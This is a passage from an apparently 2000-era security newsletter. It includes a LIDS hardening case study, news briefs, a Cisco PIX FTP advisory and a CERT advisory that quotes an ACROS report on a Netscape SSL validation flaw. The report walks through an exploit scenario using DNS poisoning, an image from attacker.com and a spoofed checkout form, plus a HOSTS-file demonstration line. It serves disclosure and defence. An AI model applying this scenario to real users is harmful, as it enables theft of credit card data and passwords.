(/usr/lib/pt07) was installed and started. Note that since the hacker has installed his or her own versions of ps, pstree, and netstat, this trojan is probably invisible to the system. What Can We Learn From This? Firstly, note that LIDS would not have prevented the actual break-in. The hacker obtained root access to the machine by connecting to and overflowing a buffer in a process that was running as root. Once the hacker had broken in, we can note how LIDS would have minimised the damage: LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and /usr/lib. These are directories that we would normally mark as immutable (chattr +i) and hence could not have been changed. Note that even without LIDS we can mark these directories as immutable using chattr +i, but LIDS prevents even the root user from tampering with the immutable flag. Similarly, the touch -t commands would have failed if the files were marked chattr +i. Even the very first line of the script, "mkdir /usr/lib/..." would have failed if the /usr/lib directory was marked immutable! Note that LIDS would not have prevented the break-in, but would have prevented the hacker from causing any significant system damage after the break-in. A backdoor process could have been installed (eg: the pt07 backdoor could have been placed in /tmp, or any other non-immutable directory), but the non-trojan versions of ps, netstat, and pstree would have detected this process fairly easily and we could have come back and killed it off. Without LIDS being installed we have no other real clues as to what the hacker might have done via this backdoor, and so our only available method to clean up the hacker's damage is to re-install the system completely. OpenWall and LIDS: An Extra Layer Another similar system to LIDS is the OpenWall project (http://www.openwall.com/linux/). The OpenWall project contains some different security features to LIDS, and one of the OpenWall patches in particular makes the stack area non-executable. An excerpt from the OpenWall README file states: Most buffer overflow exploits are based on overwriting a function's return address on the stack to point to some arbitrary code, which is also put onto the stack. If the stack area is non-executable, buffer overflow vulnerabilities become harder to exploit. Another way to exploit a buffer overflow is to point the return address to a function in libc, usually system(). This patch also changes the default address that shared libraries are mmap()'ed at to make it always contain a zero byte. This makes it impossible to specify any more data (parameters to the function, or more copies of the return address when filling with a pattern), -- in many exploits that have to do with ASCIIZ strings. Recently, the LIDS web site has contained some integrated LIDS + OpenWall kernel patches that apply the security features of both LIDS and OpenWall to the kernel in a single integrated patch set. Conclusions Using a set of layered security tools on the Linux system, it is possible to prevent a wide range of system attacks, and to protect your system against intrusion or tampering. A hacker's point of entry into your system will be the network interfaces, and protecting these, and under the network interfaces, the system kernel, can discourage many attacks and prevent others. Be aware of any potential security holes in your system. Any daemon or service running on your system, either as root or as a non-root user, can be a potential security threat. Be prepared to face attacks against these threats. @HWA 204.0 [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 12:51 AM Noel continues the story of when some Unix boxes that he helped admin were cracked. This article talks about some of the efforts made to track down the cracker and some surprises. Link: RootPrompt.org http://rootprompt.org/article.php3?article Url is b0rked You have an error in your SQL syntax near ';' at line 1 Warning: 0 is not a MySQL result index in /usr/www/users/noeld/article.php3 on line 53 @HWA 205.0 [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 12:45 AM Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant - it's got a subject line of "Check this" and consists of a one-line message and an attachment named LINKS.VBS. Its only purpose other than self replication is to add a link to a XXX site to your desktop... Link: Slashdot http://slashdot.org/article.pl?sid @HWA 206.0 [HNS] May 23:PAPERS SENT TO PROSECUTOROS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 23 May 2000 on 4:27 PM Japan had a first case in which papers have been sent to prosecutors on a minor suspected of "hacking" (article writes about hacking, but it looks it was just password stealing) since a law banning illegal computer access went into effect in February. Link: Daily Yomiuri http://www.yomiuri.co.jp/newse/0523cr11.htm @HWA 207.0 [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 23 May 2000 on 4:14 PM InfoExpress, Inc., today announced an exclusive distribution agreement with U.K.-based Network Utilities (Systems) Ltd., a leading distributor of best-in-class enterprise security. The agreement names Network Utilities the sole provider of InfoExpress' marketing and technical support in the U.K. market. Link: Press release http://www.net-security.org/cgi-bin/press/fullnews.cgi?newsid959090959,5116, @HWA 208.0 [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 23 May 2000 on 3:13 AM The European ministers of Foreign Affairs are expected to decide monday to lift all barriers to the export of encryption software to countries outside the European Union. Link: Heise http://www.heise.de/tp/english/inhalt/te/8179/1.html @HWA 209.0 [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 23 May 2000 on 3:05 AM According to Security Focus a firewall package protecting thousands of networks worldwide contains a bug that would allow attackers to obtain "root" access remotely. Link: Security Focus http://www.securityfocus.com/news/40 @HWA 210.0 [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Monday 22 May 2000 on 10:07 PM The Cisco Secure PIX Firewall interprets FTP (File Transfer Protocol) commands out of context and inappropriately opens temporary access through the firewall. Link: Cisco http://www.cisco.com/warp/public/707/pixftp-pub.shtml Cisco Secure PIX Firewall FTP Vulnerabilities Revision 1.6 For public release 2000 March 16 05:00 PM US/Pacific (UTC+0800) Summary The Cisco Secure PIX Firewall interprets FTP (File Transfer Protocol) commands out of context and inappropriately opens temporary access through the firewall. This is an interim notice describing two related vulnerabilities. The first vulnerability is exercised when the firewall receives an error message from an internal FTP server containing an encapsulated command such that the firewall interprets it as a distinct command. This vulnerability can be exploited to open a separate connection through the firewall. This vulnerability is documented as Cisco Bug ID CSCdp86352. The second vulnerability is exercised when a client inside the firewall browses to an external server and selects a link that the firewall interprets as two or more FTP commands. The client begins an FTP connection as expected and at the same time unexpectedly executes another command opening a separate connection through the firewall. This vulnerability is documented as Cisco Bug ID CSCdr09226. Either vulnerability can be exploited to transmit information through the firewall without authorization. Both vulnerabilities are addressed more completely in this updated interim security advisory. Who Is Affected All users of Cisco Secure PIX Firewalls with software versions up to and including 4.2(5), 4.4(4), and 5.0(3) that provide access to FTP services are at risk from both vulnerabilities. Cisco Secure PIX Firewall with software version 5.1(1) is affected by the second vulnerability only. Cisco Secure Integrated Software (formerly Cisco IOS® Software Firewall Feature Set) is not affected by either vulnerability. Impact Any Cisco Secure PIX Firewall that has enabled the fixup protocol ftp command is at risk of unauthorized transmission of data through the firewall. Details The first vulnerability has been assigned Cisco bug ID CSCdp86352. The second vulnerability has been assigned Cisco bug ID CSCdr09226. The behavior is due to the command fixup protocol ftp [portnum], which is enabled by default on the Cisco Secure PIX Firewall. If you do not have protected FTP hosts with the accompanying configuration (configuration example below) you are not vulnerable to the attack which causes a server to send a valid command, encapsulated within an error message, and causes the firewall to read the encapsulated partial command as a valid command (CSCdp86352). To exploit this vulnerability, attackers must be able to make connections to an FTP server protected by the PIX Firewall. If your Cisco Secure PIX Firewall has configuration lines similar to the following: fixup protocol ftp 21 and either conduit permit tcp host 192.168.0.1 eq 21 any or conduit permit tcp 192.168.0.1 255.255.255.0 eq 21 any It is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies. If you permit internal clients to make arbitrary FTP connections outbound, you may be vulnerable to the second vulnerability (CSCdr09226). This is an attack based on CERT advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests http://www.cert.org/advisories/CA-2000-02.html and detailed in the BUGTRAQ post: "Extending the FTP 'ALG' vulnerability to any FTP client" http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-0 8&msg=38C8C8EE.544524B1@enternet.se The recommendation in the workarounds section of this document will provide protection against this vulnerability. Response for the first vulnerability (CSCdp86352) The following changes have been made to the "fixup protocol FTP" behavior of the PIX Firewall: Enforce that only the server can generate a reply indicating the PASV command was accepted. Enforce that only the client can generate a PORT command. Enforce that data channel is initiated from the expected side in an FTP transaction. Verify that the "227" reply code and the PORT command are complete commands and not part of a "500" error code string broken into fragments. Enforce that the port is not 0 or in the range between [1,1024] These or equivalent changes will be carried forward into all PIX Firewall software versions after version 5.1(1). Response for the second vulnerability (CSCdr09226) We have added an additional command keyword to address this problem: fixup protocol ftp [strict] [-] The "strict" keyword directs the fixup protocol ftp command to maintain strict command state, and may impact some FTP features such as command pipelining or command grouping. This will be fixed in version 5.1(2) and subsequent versions, as well as in version 4.4(5). Software Versions and Fixes Getting Fixed Software Cisco is offering free software upgrades to remedy this vulnerability for all affected customers. Customers with service contracts may upgrade to any software version. Customers without contracts may upgrade only within a single row of the table below, except that any available fixed software will be provided to any customer who can use it and for whom the standard fixed software is not yet available. As always, customers may install only the feature sets they have purchased. Version Affected Interim Release**(fix will carry forward into all later versions) Available Now through the TAC Projected first fixed regular release (fix will carry forward into all later versions) All versions of Cisco Secure PIX up to version 4.2(5) (including 2.7, 3.0, 3.1, 4.0, 4.1) 4.2(5)205** 4.2(6) Currently not scheduled.* All 4.3.x and 4.4.x up to and including version 4.4(4) 4.4(4)202** 4.4(5) Estimated date available: 2000 May 30* All 5.0.x up to and including version 5.0(1) 5.0(3)202** 5.0(4) Estimated date available: On hold Version 5.1(1) - not affected by CSCdp86352 5.1(1)207** 5.1(2) Estimated date available: 2000 June 9* * All dates are tentative and subject to change ** Interim releases are subjected to less internal testing and verification than are regular releases, may have serious bugs, and should be installed with great care. Schedules have been updated to include released versions that fix both vulnerabilities addressed by this interim security advisory. Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained via the Software Center on Cisco's Worldwide Web site at http://www.cisco.com/. Customers without contracts should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows: +1 800 553 2447 (toll-free from within North America) +1 408 526 7209 (toll call from anywhere in the world) e-mail: tac@cisco.com Give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software upgrades. Hardware requirements If version 4.3 or 4.4 is utilized on a PIX 'Classic' (excludes PIX10000, PIX-510, PIX-520, and PIX-515) or If version 5.0 is utilized on a PIX 'Classic', PIX10000, or PIX-510 (excludes PIX-520 and PIX-515) A 128MB upgrade for the PIX Firewall is necessary. As with any new software installation, customers planning to upgrade should carefully read the release notes and other relevant documentation before beginning any upgrade. Also, it is important to be certain that the new version of Cisco Secure PIX Firewall software is supported by your hardware, and especially that enough memory is available. Workarounds The behaviors described in this document are a result of the default command fixup protocol ftp [portnum]. To disable this functionality, enter the command no fixup protocol ftp. This will disable support of the fixup of the FTP protocol in the PIX, and will eliminate the vulnerabilities. The command fixup protocol ftp 21 is the default setting of this feature, and is enabled by default on the Cisco Secure PIX Firewall. This workaround will force your clients to use FTP in passive mode, and inbound FTP service will not be supported. Outbound standard FTP will not work without fixup protocol ftp 21, however, passive FTP will function correctly with no fixup protocol ftp configured. Exploitation and Public Announcements This vulnerability was proposed on the BUGTRAQ list, and in follow-ups to the article, the Cisco Secure PIX Firewall was also identified as susceptible. As the vulnerabilities have been widely discussed, Cisco is posting this advisory prior to having a full fix. We will update this notice again, when we have a full fix available. Cisco has had no reports of malicious exploitation of this vulnerability. However, versions of exploit scripts have been posted to various security related lists. This vulnerability was reported to Cisco via several sources, shortly after the time of the original supposition. Status of This Notice: INTERIM This is an interim field notice. Although Cisco cannot guarantee the accuracy of all statements in this notice, all the facts have been checked to the best of our ability. Cisco anticipates issuing updated versions of this notice within four weeks (by June 26, 2000). Distribution This notice will be posted on Cisco's Worldwide Web site at http://www.cisco.com/warp/public/707/pixftp-pub.shtml. In addition to Worldwide Web posting, the initial version of this notice is being sent to the following e-mail and Usenet news recipients: cust-security-announce@cisco.com bugtraq@securityfocus.com first-teams@first.org (includes CERT/CC) cisco@spot.colorado.edu comp.dcom.sys.cisco firewalls@lists.gnac.com Various internal Cisco mailing lists Future updates of this notice, if any, will be placed on Cisco's Worldwide Web server, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL given above for any updates. Revision History Revision 1.0 2000 March 16 08:00 AM US/Pacific (UTC+0800)- Initial public release Revision 1.1 2000 March 16 08:00 AM US/Pacific (UTC+0800) - Link corrections, table head clarification. Revision 1.3 2000 March 16 14:00 PM US/Pacific (UTC+0800) - Addition of 2nd vulnerability issues. Revision 1.4 2000 April 4 12:00 PM US/Pacific (UTC+0800) - Changes to dates for fixed software and Status of This Notice section. Revision 1.5 2000 April 28 5:30 PM US/Pacific (UTC+0800) - Changes to Summary, Response for the second vulnerability (CSCdr09226), Software Versions and Fixes, and Status of This Notice sections. Revision 1.6 2000 May 19 10:45 AM US/Pacific (UTC+0800) - Changes to date in Status of This Notice INTERIM section, and date change in the Software Version and Fixes section. Cisco Security Procedures Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's Worldwide Web site at http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This includes instructions for press inquiries regarding Cisco security notices. @HWA 211.0 [HNS] May 22:INDIA AND CYBER CRIME ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Monday 22 May 2000 on 7:11 PM The Times of India published an article about cyber crime, where they mention trojan horses as "cyber terrorism weapons". Other part of the article speaks of what would they police do for fighting cyber crime. "The police headquarters here has just two Internet connections. And only 30 officers were introduced to a beginners' guide to computers early this year"... Link: The Times of India http://www.timesofindia.com/210500/21home5.htm @HWA 212.0 [IND] CERT® Advisory CA-2000-05 NS Improper SSL validation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Netscape Navigator Improperly Validates SSL Sessions http://www.cert.org/advisories/CA-2000-05.html CERT® Advisory CA-2000-05 Netscape Navigator Improperly Validates SSL Sessions Original release date: May 12, 2000 Source: ACROS, CERT/CC A complete revision history is at the end of this file. Systems Affected Systems running Netscape Navigator 4.72, 4.61, and 4.07. Other versions less than 4.72 are likely to be affected as well. Overview The ACROS Security Team of Slovenia has discovered a flaw in the way Netscape Navigator validates SSL sessions. I. Description The text of the advisory from ACROS is included below. It includes information CERT/CC would not ordinarily publish, including specific site names and exploit information. However, because it is already public, we are including it here as part of the complete text provided by ACROS. =====[BEGIN-ACROS-REPORT]===== ========================================================================= ACROS Security Problem Report #2000-04-06-1-PUB ------------------------------------------------------------------------- Bypassing Warnings For Invalid SSL Certificates In Netscape Navigator ========================================================================= FULL REPORT PUBLIC ====== Affected System(s): Netscape Navigator & Communicator Problem: Bypassing Warnings For Invalid SSL Certificates Severity: High Solution: Installing the Personal Security Manager or Installing the newest Netscape Communicator (v4.73) Discovered: April 3, 2000 Vendor notified: April 4, 2000 Last update: May 10, 2000 Published: May 10, 2000 SUMMARY ======= Our team has discovered a flaw in Netscape Navigator that allows bypassing of warning about an invalid SSL certificate. SSL protection is used in most major Internet-based financial services (e-banking, e-commerce). The flaw we have found effectively disables one of the two basic SSL functionalities: to assure users that they are really communicating with the intended web server - and not with a fake one. Using this flaw, the attacker can make users send secret information (like credit card data and passwords) to his web server rather than the real one - EVEN IF THE COMMUNICATION IS PROTECTED BY SSL PROTOCOL. INTRODUCTION (skip this section if you already understand how SSL works) ============ When a web browser tries to connect to a SSL-protected server, a so-called SSL session is established. At the beginning of this session the server presents his SSL certificate containing his public key. At this point, browser checks the certificate for the following conditions (*): 1) Certificate must be issued by a certificate authority trusted by browser (some are default: Verisign, Thawte etc.) 2) Certificate must not be expired (its expiry date:time must be later than the current system date:time on the computer browser is running on) 3) Certificate must be for the server that browser is connecting to (if browser is connecting to www.e-bank.com, the certificate must be for www.e-bank.com) All three conditions must be met for browser to accept the certificate. For every condition not met, browser should display a warning to the user and then user can decide whether connection should be established or not. These three conditions combined provide user with assurance that his browser is really connecting to the correct server and not to some fake server placed on the Internet by malicious individual(s) trying to trick users to give them credit card information, passwords and other secret information. For example, let's take a look at a sample web e-banking system that doesn't use SSL certificates and requires one-time password tokens for user authentication. User connects to http://www.e-bank.com. Browser asks DNS server for IP address of www.e-bank.com and gets 100.100.100.100. Browser then connects to 100.100.100.100 and user is presented with login form asking for his username and one-time password. He enters this data and starts using e-banking services. A simple attack (called web-spoofing) on this system is to attack the DNS server and "poison" its entry for www.e-bank.com with attacker's IP address 99.99.99.99. Attacker sets up a web server at 99.99.99.99 that web-wise looks exactly like the original www.e-bank.com server. User trying to connect to www.e-bank.com will now instead connect to the attacker's server and provide it with his one-time password. Attacker's server will use this password to connect to the real server at 100.100.100.100 and transfer all of the user's money to his secret Swiss bank account ;-). This attack is successfully disabled by using SSL protocol. In that case, when browser falsely connects to www.e-bank.com at 99.99.99.99 rather than to 100.100.100.100, attacker's server must provide a valid certificate for www.e-bank.com, which it can't unless the attacker has stolen the secret key and the certificate from the real server. Let's look at three possibilities: 1) Attacker could issue a certificate for www.e-bank.com himself (on his own CA). That wouldn't work since his CA is not trusted by user's browser. 2) Attacker could use a stolen expired key and certificate (those are often not protected as strongly as valid ones since one could think they can't be used any more). That wouldn't work since browser will notice that certificate is expired. 3) Attacker could use a valid key and certificate for some other site (e.g. www.something.org). That wouldn't work since browser will accept only valid certificates for www.e-bank.com. It would seem that this problem of web-spoofing is successfully solved with SSL certificates. PROBLEM ======= There is a flaw in implementation of SSL certificate checks in Netscape Navigator. The Flaw -------- Netscape Navigator correctly checks the certificate conditions (*) at the beginning of a SSL session it establishes with a certain web server. The flaw is, while this SSL session is still alive, all HTTPS connections to *THAT SERVER'S IP ADDRESS* are assumed to be a part of this session (and therefore certificate conditions are not checked again). Instead of comparing hostnames to those of currently open sessions, Navigator compares IP addresses. Since more than one hostname can have the same IP address, there is a great potential for security breach. This behavior is not in compliance with SSL specification. DEMONSTRATION ============= The following will try to demonstrate the flaw. It is assumed that for redirecting user's web traffic, the attacker will generally use "DNS poisoning" or reconfiguring routers, while in our demonstration we will use the HOSTS file on client computer to get the same effect and make it easier to reproduce the flaw. In this demonstration, we will make Navigator open Thawte's homepage over secure (HTTPS) connection while requesting Verisign's home address at https://www.verisign.com. Thawte's and Verisign's homepages are used as examples - this would work just the same on any other secured web sites. 1) First, add the following line to the local HOSTS file on the computer running the Navigator and save it: 207.240.177.177 www.verisign.com This will make the computer (and, consequently, the browser) think that IP address of www.verisign.com (which is actually 205.139.94.60) is in fact 207.240.177.177 (which is actually IP address of www.thawte.com). At this point it is important to note that SSL, if correctly implemented, provides protection against such "domain name spoofing", because while the browser will connect to the wrong server, that server will not be able to provide a valid SSL certificate and the SSL session will not be established (not without user being warned about the certificate). 2) Close all instances of Navigator to clean any cached IP addresses. 3) Open Navigator and go to https://www.thawte.com. It works as it should - Thawte's server provides a valid SSL certificate for its hostname (www.thawte.com) and so the SSL session is established. 4) With the same instance of Navigator, go to https://www.verisign.com. Now watch the Thawte's homepage appear again WITHOUT ANY WARNINGS! What happened here? In step 3), Navigator looked up the IP address for www.thawte.com (from the DNS server) and found 207.240.177.177. It tried to establish a SSL session with that IP address and correctly checked all three certificate conditions (*) - indeed, if any of them weren't true, a warning would pop up. In step 4), Navigator looked up the IP address for www.verisign.com (this time from HOSTS file, but it could easily have been from the same DNS server) and found again 207.240.177.177. Now, since there was already one SSL session open with that IP address, Navigator *INCORRECTLY* decided to use that session instead of establishing another one. EXPLOIT ======= This exploit will show how the flaw could be used to gather user's secret information. Assume there is a web bookstore at www.thebookstore.com. Users go to http://www.thebookstore.com (via normal HTTP connection), browse the books and add them to their virtual shopping baskets. At the check-out, they are directed to a secure order form (e.g. https://www.thebookstore.com/order_form.html) where they enter their personal and credit card information which is then submitted (again via secure HTTPS connection) to the server. This is a typical web e-commerce concept. Assume that IP address of www.thebookstore.com is 100.100.100.100. The attacker sets up his own web server with IP address 99.99.99.99 and installs on it a valid SSL certificate for host www.attacker.com (he could have purchased this certificate from e.g. Verisign if he owns the domain attacker.com; he could have stolen the certificate or he could have broken into a web server with a certificate already installed). The attacker makes this web server function as a gateway to www.thebookstore.com - meaning that all requests are forwarded to www.thebookstore.com, so virtually this server "looks and feels" exactly like the real www.thebookstore.com. There is just one difference: the page before the order form (e.g. http://www.thebookstore.com/basket.html) contains a small (1x1) image originating from https://www.attacker.com (secure HTTPS connection). Then, the attacker "poisons" a heavily used DNS server so that it will return 99.99.99.99 for requests about www.thebookstore.com (normally it returns 100.100.100.100). What happens then? All users of that DNS server who will try to visit (via normal HTTP) http://www.thebookstore.com will connect to 99.99.99.99 instead of 100.100.100.100 but will not notice anything because everything will look just the way it should. They will browse the books and add them to their shopping baskets and at check-out, they will be presented with the order form https://www.thebookstore.com/order_form.html. But the previous HTML page containing the hyperlink to the order form will also contain a small (1x1) image with source https://www.attacker.com/a.gif. Navigator will successfully download this image and for that it will establish a SSL session with www.attacker.com. This session then stays open. When the order form is accessed, Navigator tries to establish another SSL session, this time to www.thebookstore.com. Since DNS server claims this server has the same IP address as www.attacker.com (99.99.99.99), Navigator will use the existing SSL session with 99.99.99.99 and will not check the certificate. The result: Navigator is displaying a SECURE ORDER FORM that it believes to be originating from the genuine server www.thebookstore.com while in fact it is originating from the fake one. No warning about an invalid certificate is issued to the user so he also believes to be safe. When user submits his secret information, it goes to (through) the attacker's server where it is collected for massive abuse. For users to notice the foul play they would have to look at the certificate properties while on a "secure" page https://www.thebookstore.com/... The properties would show that the certificate used was issued for host www.attacker.com. Also, monitoring network traffic would show that the server is not at 100.100.100.100 where it should be but rather at 99.99.99.99. It is a very rare practice to check any of these when nothing suspect is happening. Notes ----- It should be noted that in the previous exploit, if the users tried to access https://www.thebookstore.com over secure (HTTPS) connection from the very start, Navigator would issue a warning. It is imperative for the exploit to work that some time *before* the first secure connection to https://www.thebookstore.com a successful secure connection is made to https://www.attacker.com. That's why a valid certificate must be installed on www.attacker.com. Also, it should be noted that Navigator's SSL sessions don't last forever. We haven't been able to predict the duration of these sessions (it seems to be depending on many things like inactivity time, total time etc.) and we also haven't investigated the possible effects of SSL session resuming. SOLUTION ======== Netscape has (even prior to our notification - see the Acknowledgments section) provided a Navigator Add-on called Personal Security Manager (PSM), freely downloadable at: http://www.iplanet.com/downloads/download/detail_128_316.html Installation of PSM, as far as we have tested it, corrects the identified flaw. Netscape Communicator (v4.73) currently includes the fix for this vulnerability. It is available for download at: http://home.netscape.com/download/ WORKAROUND ========== Navigator/Communicator users who can't or don't want to install PSM can use a "manual" method to make sure they are not under attack: When visiting an SSL-protected site, double click on the lock icon (bottom left corner) or the key icon (in older browsers) and see whether the certificate used for the connection is really issued for the correct hostname. E.g. If you visit https://www.verisign.com, make sure the certificate used is issued for www.verisign.com and not for some other hostname. ADVISORY ======== It is important to emphasize that the flaw presented completely compromises SSL's ability to provide strong server authentication and therefore poses a serious threat to Navigator users relying on its SSL protection. Users of web services --------------------- Netscape Navigator/Communicator users who are also users of any critical web services employing Secure Sockets Layer (SSL) protection to provide secrecy and integrity of browser-server communication are strongly advised to install Personal Security Manager or upgrade to Communicator 4.73 and thus disable this vulnerability. Main examples of such critical web services are: - web banking systems (especially the ones using passwords for authentication - even one-time passwords), - web stores (especially the ones accepting credit card data) and - other web-based e-commerce systems. Providers of web services ------------------------- Providers of critical web services employing Secure Sockets Layer (SSL) protection to provide secrecy and integrity of browser-server communication should advise their users to install Personal Security Manager or upgrade to Communicator 4.73 and thus disable this vulnerability. Since this vulnerability allows for the type of attack that can completely bypass the real/original web server, there are no technical countermeasures which providers of web services could deploy at their sites. Web services using client SSL certificates for user authentication ------------------------------------------------------------------ This vulnerability does NOT allow the attacker to steal client's SSL key and thus execute the man-in-the-middle attack on web services using client SSL certificates for user authentication. It still does, however, allow the attacker to place a fake server (an exact copy) and collect other information users provide (including the data in their client SSL certificates). TESTING RESULTS =============== Tests were performed on: Communicator 4.72 - affected Communicator 4.61 - affected Navigator 4.07 - affected ACKNOWLEDGMENTS =============== We would like to acknowledge Netscape (specifically Mr. Bob Lord and Mr. Kevin Murray) for prompt and professional response to our notification of the identified vulnerability and their help in understanding the flaw and "polishing" this report. We would also like to acknowledge Mr. Matthias Suencksen of Germany, who has discovered some aspects of this vulnerability before we did (back in May 1999). REFERENCES ========== Netscape has issued a Security Note about this vulnerability under a title "The Acros-Suencksen SSL Vulnerability" at: http://home.netscape.com/security/notes/index.html SUPPORT ======= For further details about this issue please contact: Mr. Mitja Kolsek ACROS, d.o.o. Stantetova 4 SI - 2000 Maribor, Slovenia phone: +386 41 720 908 e-mail: mitja.kolsek@acros.si PGP Key available at PGP.COM's key server. PGP Fingerprint: A655 F61C 5103 F561 6D30 AAB2 2DD1 562A DISTRIBUTION ============ This report was sent to: - BugTraq mailing list - NTBugTraq mailing list - Win2KSecAdvice mailing list - SI-CERT - ACROS client mailing list DISCLAIMER ========== The information in this report is purely informational and meant only for the purpose of education and protection. ACROS, d.o.o. shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. All identifiers (hostnames, IP addresses, company names, individual names etc.) used in examples and exploits are used only for explanatory purposes and have no connection with any real host, company or individual. In no event should it be assumed that use of these names means specific hosts, companies or individuals are vulnerable to any attacks nor does it mean that they consent to being used in any vulnerability tests. The use of information in this report is entirely at user's risk. COPYRIGHT ========= (c) 2000 ACROS, d.o.o., Slovenia. Forwarding and publishing of this document is permitted providing all information between marks "[BEGIN-ACROS-REPORT]" and "[END-ACROS-REPORT]" remains unchanged. =====[END-ACROS-REPORT]===== II. Impact Attackers can trick users into disclosing information (potentially including credit card numbers, personal data, or other sensitive information) intended for a legitimate web site, even if that web site uses SSL to authenticate and secure transactions. III. Solution Install an update from your vendor. Appendix A lists information from vendors about updates. If you are a DNS administrator, maintain the integrity of your DNS server One way to exploit this vulnerability, described above, relies on the ability of the attacker to compromise DNS information. If you are a DNS administrator, making sure your DNS server is up-to-date and free of known vulnerabilities reduces the ability of an intruder to execute this type of attack. Administrators of BIND DNS servers are encouraged to read http://www.cert.org/advisories/CA-2000-03.html Validate certificates at each use Despite the existence of this flaw, it is still possible to guard against attempted attacks by validating certificates manually each time you connect to an SSL-secured web site. Doing so will substantially reduce the ability of an attacker to use flaws in the DNS system to bypass SSL-authentication. Appendix A. Vendor Information iPlanet Information about this problem is available at http://home.netscape.com/security/notes/index.html Microsoft None of our products are affected by this vulnerability. The CERT Coordination Center thanks the ACROS Security Team of Slovenia (Contact: mitja.kolsek@acros.si), for the bulk of the text in this advisory. Shawn Hernan was the primary author of the CERT/CC portions of this document. This document is available from: http://www.cert.org/advisories/CA-2000-05.html CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. Conditions for use, disclaimers, and sponsorship information Copyright 2000 Carnegie Mellon University; portions Copyright 2000 ACROS, d.o.o., Slovenia. Revision History May 12, 2000: Initial release @HWA 213.0 [MM] IBM will only hire immitation hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm and ZDNet http://www.anchordesk.co.uk/anchordesk/commentary/columns/0,2415,7102547,00.html May 16, 2000 IBM will only hire immitation hackers David Binney, director of corporate security for IBM stated, "IBM would never consider hiring a reformed hacker. It would be like hiring a burglar to institute a burglar system in your house. You wouldn't do it." When Lewis Koch, a journalist with ZDNET UK, attempted to ascertain if there were any ulterior motives for the statement, Binney backed out of the interview. Read the entire story (below). Thanks to Jane Oliver at ZDNET for the submission. - Packetstorm ZDnet; Commentary Box May 15, 2000 What the hack did he say? "IBM would never consider hiring a reformed hacker. It would be like hiring a burglar to institute a burglar system on your house. You wouldn't do it." So said David Binney, director of corporate security at IBM, in Solar Sunrise, a video produced last year by the Federal Bureau of Investigation and the National Infrastructure Protection Center, ostensibly to deter people from hacking. By Lewis Z. Koch In Binney's view, hackers, like burglers, break in with the intent to steal. IBM won't hire you, he said, and neither will any responsible computer security firm. Hack and you'll never work in this town again. Don't believe it, Binney. The town and the times are a-changin'. Testing the thesis A number of top-tier, high-profile firms feel differently about hackers. Evidence? Look at the recent joint venture among a group of hackers known as the L0pht, Compaq Computer and Forrester Research that involves $10 million in venture capital. There's nothing "reformed" about the L0pht; members wear the mantle of hacker proudly, says Space Rogue, a L0pht member in good standing. Although not a hacker, reformed or otherwise, Steve Lutz, president of WaySecure Consulting, hires reformed hackers. His company offers a full range of computer security consulting, including evidence gathering, risk assessment, security testing and training. Among the hundreds of clients he and his hackers have served are Chase Manhattan, American Express, Morgan Stanley Dean Witter, insurance giant Transamerica, TIAA-CREF, the U.S. Navy and the U.S. Army - organisations with serious items to protect: money, 